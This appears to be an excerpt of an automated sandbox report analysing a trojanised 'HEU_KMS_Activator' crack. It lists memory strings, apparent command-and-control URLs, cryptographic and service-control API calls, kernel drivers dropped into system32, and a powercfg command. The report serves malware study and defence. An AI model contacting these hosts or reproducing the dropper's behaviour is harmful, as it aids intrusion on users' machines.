Source: J8156NOVDEC.exe, J8156NOVDEC.exe, 00000003.00000002.2505833885.0000000000CBD000.00000004.00000001.01000000.00000006.sdmp, J8156NOVDEC.exe, 00000003.00000000.1258257647.0000000000CBD000.00000008.00000001.01000000.00000006.sdmp, wrme.exe, wrme.exe, 00000011.00000002.1339432193.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe, 00000011.00000000.1272801464.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, _J8156NOVDEC.exe.1.dr, J8156NOVDEC.exe.2.dr, wuhost.exe.1.dr, wrme.exe.1.dr, nsjB6CE.tmp.1.drString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: J8156NOVDEC.exe, wrme.exeString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html#
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp, HEU_KMS_Activator.exe, 00000001.00000002.1281058789.0000000002784000.00000004.00000020.00020000.00000000.sdmp, HEU_KMS_Activator.exe, 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp, _J8156NOVDEC.exe, 00000002.00000003.1251454537.0000000001566000.00000004.00000020.00020000.00000000.sdmp, _J8156NOVDEC.exe.1.dr, KMDF_LOOK.sys.1.dr, J8156NOVDEC.exe.2.dr, wuhost.exe.1.dr, DvLayout.exe.1.dr, wccenter.exe.1.dr, wrme.exe.1.dr, nsjB6CE.tmp.1.drString found in binary or memory: https://d.symcb.com/cps0%
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp, HEU_KMS_Activator.exe, 00000001.00000002.1281058789.0000000002784000.00000004.00000020.00020000.00000000.sdmp, HEU_KMS_Activator.exe, 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp, _J8156NOVDEC.exe, 00000002.00000003.1251454537.0000000001566000.00000004.00000020.00020000.00000000.sdmp, _J8156NOVDEC.exe.1.dr, KMDF_LOOK.sys.1.dr, J8156NOVDEC.exe.2.dr, wuhost.exe.1.dr, DvLayout.exe.1.dr, wccenter.exe.1.dr, wrme.exe.1.dr, nsjB6CE.tmp.1.drString found in binary or memory: https://d.symcb.com/rpa0
Source: wrme.exe, 00000011.00000002.1339700172.0000000000F28000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000002.1339432193.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe, 00000011.00000000.1272801464.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wuhost.exe.1.dr, wrme.exe.1.drString found in binary or memory: https://da.testiu.com
Source: wrme.exe, 00000011.00000002.1339700172.0000000000F28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://da.testiu.com/api/v1/p
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp, HEU_KMS_Activator.exe, 00000001.00000002.1281058789.0000000002784000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, wrme.exe, 00000011.00000002.1339700172.0000000000F28000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000002.1339432193.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe, 00000011.00000000.1272801464.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wuhost.exe.1.dr, wrme.exe.1.drString found in binary or memory: https://db.testyk.com
Source: wrme.exe, 00000011.00000002.1339700172.0000000000F28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://db.testyk.com/api/v1/p
Source: wrme.exe, 00000011.00000002.1339700172.0000000000F28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://db.testyk.com/api/v1/ppk?
Source: svchost.exe, 00000005.00000002.1374333370.00000211DEE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373665727.00000211DEE57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
Source: svchost.exe, 00000005.00000002.1374376427.00000211DEE63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1374424171.00000211DEE70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000005.00000002.1374333370.00000211DEE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373665727.00000211DEE57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000005.00000003.1373416662.00000211DEE67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000005.00000003.1373220888.00000211DEE74000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1374445423.00000211DEE76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
Source: svchost.exe, 00000005.00000002.1374333370.00000211DEE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373665727.00000211DEE57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000005.00000003.1373456417.00000211DEE62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1374208141.00000211DEE2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373596706.00000211DEE5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1374376427.00000211DEE63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000005.00000002.1374333370.00000211DEE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373665727.00000211DEE57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 00000005.00000002.1374208141.00000211DEE2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1374406045.00000211DEE68000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373416662.00000211DEE67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000005.00000002.1374333370.00000211DEE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373665727.00000211DEE57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000005.00000002.1374333370.00000211DEE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373665727.00000211DEE57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000005.00000002.1374333370.00000211DEE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373665727.00000211DEE57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000005.00000003.1373456417.00000211DEE62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1374208141.00000211DEE2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1374376427.00000211DEE63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
Source: svchost.exe, 00000005.00000002.1374288589.00000211DEE42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373639795.00000211DEE41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000005.00000002.1374333370.00000211DEE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373665727.00000211DEE57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000005.00000003.1373456417.00000211DEE62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1374376427.00000211DEE63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp, HEU_KMS_Activator.exe, 00000001.00000002.1281058789.0000000002784000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, wrme.exe, 00000011.00000002.1339700172.0000000000F28000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000002.1339432193.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe, 00000011.00000000.1272801464.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wuhost.exe.1.dr, wrme.exe.1.drString found in binary or memory: https://du.testjj.com
Source: nsjB6CE.tmp.1.drString found in binary or memory: https://du.testjj.com/api/v1/id
Source: J8156NOVDEC.exe, 00000003.00000002.2507675639.000000000135E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://du.testjj.com/api/v1/id$
Source: J8156NOVDEC.exe, 00000003.00000002.2507675639.000000000135E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://du.testjj.com/api/v1/id.
Source: J8156NOVDEC.exe, 00000003.00000002.2507675639.000000000135E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://du.testjj.com/api/v1/id7
Source: J8156NOVDEC.exe, 00000003.00000002.2507675639.000000000135E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://du.testjj.com/api/v1/id:
Source: J8156NOVDEC.exe, 00000003.00000002.2507675639.000000000135E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://du.testjj.com/api/v1/idR
Source: J8156NOVDEC.exe, 00000003.00000002.2507675639.0000000001327000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://du.testjj.com/api/v1/idREnN
Source: J8156NOVDEC.exe, 00000003.00000002.2507675639.000000000135E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://du.testjj.com/api/v1/idY
Source: J8156NOVDEC.exe, 00000003.00000002.2507675639.000000000135E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://du.testjj.com/api/v1/ide
Source: J8156NOVDEC.exe, 00000003.00000002.2507675639.000000000135E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://du.testjj.com/api/v1/idh
Source: J8156NOVDEC.exe, 00000003.00000002.2507675639.000000000135E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://du.testjj.com/api/v1/ido
Source: J8156NOVDEC.exe, 00000003.00000002.2507675639.0000000001327000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://du.testjj.com/api/v1/idoESN
Source: J8156NOVDEC.exe, 00000003.00000002.2507675639.000000000135E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://du.testjj.com/api/v1/idt
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://du.testjj.comhttps://da.testiu.comhttps://db.testyk.com/api/v1/pContent-Type:application/x-w
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp, wuhost.exe.1.drString found in binary or memory: https://du.testjj.comhttps://da.testiu.comhttps://db.testyk.com/api/v1/pSoftware
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.0000000002784000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000002.1339432193.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe, 00000011.00000000.1272801464.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe.1.drString found in binary or memory: https://du.testjj.comhttps://da.testiu.comhttps://db.testyk.com/api/v1/pinvalid
Source: svchost.exe, 00000005.00000002.1374288589.00000211DEE42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373639795.00000211DEE41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tilep
Source: svchost.exe, 00000005.00000003.1373639795.00000211DEE41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1374376427.00000211DEE63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000005.00000003.1373639795.00000211DEE41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000005.00000003.1373456417.00000211DEE62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1374376427.00000211DEE63000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000005.00000002.1374288589.00000211DEE42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373639795.00000211DEE41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373518440.00000211DEE5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
Source: svchost.exe, 00000005.00000002.1374424171.00000211DEE70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000005.00000002.1374333370.00000211DEE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373665727.00000211DEE57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000005.00000003.1267630404.00000211DEE36000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ecn.dev.virtualearth.net/REST/V1/MapControlConfiguration/native/
Source: svchost.exe, 00000005.00000002.1374208141.00000211DEE2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1374406045.00000211DEE68000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373416662.00000211DEE67000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: qmgr.db.22.dr String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000016.00000003.1281171307.000002C2B7190000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.22.dr String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: kms_x64.exe, 0000002B.00000002.2509975294.0000018A2B459000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://msdn.itellyou.cn=======4
Source: qmgr.db.22.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:
Source: svchost.exe, 00000005.00000003.1373639795.00000211DEE41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000005.00000003.1373620330.00000211DEE48000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000005.00000003.1267630404.00000211DEE36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373620330.00000211DEE48000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000005.00000002.1374208141.00000211DEE2B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000005.00000002.1374333370.00000211DEE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373665727.00000211DEE57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000005.00000002.1374333370.00000211DEE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373665727.00000211DEE57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
Source: unknown HTTPS traffic detected: 103.224.212.216:443 -> 192.168.2.7:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 103.224.212.211:443 -> 192.168.2.7:49711 version: TLS 1.2
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exe Code function: 1_2_00404E68 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exe Code function: 1_2_0040425D GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe Code function: 2_2_006B3790 CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,@_RTC_CheckStackVars@8
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe Code function: 3_2_00C73790 CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,@_RTC_CheckStackVars@8
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe Code function: 17_2_00EAE520 CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext

System Summary

Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000291E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_879fa425-f
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000291E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer" memstr_ce7ede72-e
Source: HEU_KMS_Activator.exe, 00000004.00000002.2505981906.0000000000DE4000.00000002.00000001.01000000.00000007.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_bc667202-1
Source: HEU_KMS_Activator.exe, 00000004.00000002.2505981906.0000000000DE4000.00000002.00000001.01000000.00000007.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer" memstr_3645b265-4
Source: 7Z.EXE, 00000022.00000003.1321709735.00000000023AB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_7b01180f-4
Source: 7Z.EXE, 00000022.00000003.1321709735.00000000023AB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer" memstr_3051f025-7
Source: 7Z.EXE, 00000022.00000003.1321709735.00000000023B9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_d5525f31-e
Source: 7Z.EXE, 00000022.00000003.1321709735.00000000023B9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainerL memstr_8de44e79-4
Source: kms_x64.exe, 0000002B.00000002.2513065647.00007FF67B7C9000.00000002.00000001.01000000.00000016.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_3c28e9e6-3
Source: kms_x64.exe, 0000002B.00000002.2513065647.00007FF67B7C9000.00000002.00000001.01000000.00000016.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainerL memstr_ab4c0aec-5
Source: kms_x64.exe.34.dr String found in binary or memory: This is a third-party compiled AutoIt script. memstr_eacee51d-4
Source: kms_x64.exe.34.dr String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainerL memstr_d8be9540-d
Source: HEU_KMS_Activator.exe.4.dr String found in binary or memory: This is a third-party compiled AutoIt script. memstr_2b3105d6-3
Source: HEU_KMS_Activator.exe.4.dr String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer" memstr_bf65d1ec-c
Source: HEU_KMS_Activator.exe.1.dr String found in binary or memory: This is a third-party compiled AutoIt script. memstr_2a7910f6-b
Source: HEU_KMS_Activator.exe.1.dr String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer" memstr_3f673dc6-a
Source: nsjB6CE.tmp.1.dr String found in binary or memory: This is a third-party compiled AutoIt script. memstr_933fde6e-a
Source: nsjB6CE.tmp.1.dr String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer" memstr_a29c8a82-3
Source: C:\Windows\System32\drivers\DvLayout.exe Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /h off
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe Code function: 2_2_00632A30 CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe Code function: 2_2_00641C20 OpenSCManagerW,OpenServiceW,ControlService,Sleep,Sleep,QueryServiceStatus,Sleep,QueryServiceStatus,DeleteService,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exe Code function: 1_2_00403783 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exe File created: C:\Windows\system32\drivers\KMDF_LOOK.sys
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exe File created: C:\Windows\system32\drivers\KMDF_Protect.sys
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exe File created: C:\Windows\system32\drivers\DvLayout.exe
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe File created: C:\Windows\splashlogo.gif
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe File created: C:\Windows\_temp07242019502489
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe File created: C:\Windows\_temp07242019502489\KMSmini.7z
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe File created: C:\Windows\_temp07242019502489\digital.7z
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe File created: C:\Windows\_temp07242019502489\cert.7z
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe File created: C:\Windows\_temp07242019502489\DigitalLicence.7z
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe File created: C:\Windows\_temp07242019502489\7Z.EXE
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe File created: C:\Windows\HeuKmsRenewal
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe File created: C:\Windows\HeuKmsLog
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe File created: C:\Windows\HeuKmsRenewal\HEU_KMS_Activator.exe
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Windows\ScriptTemp.ini
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
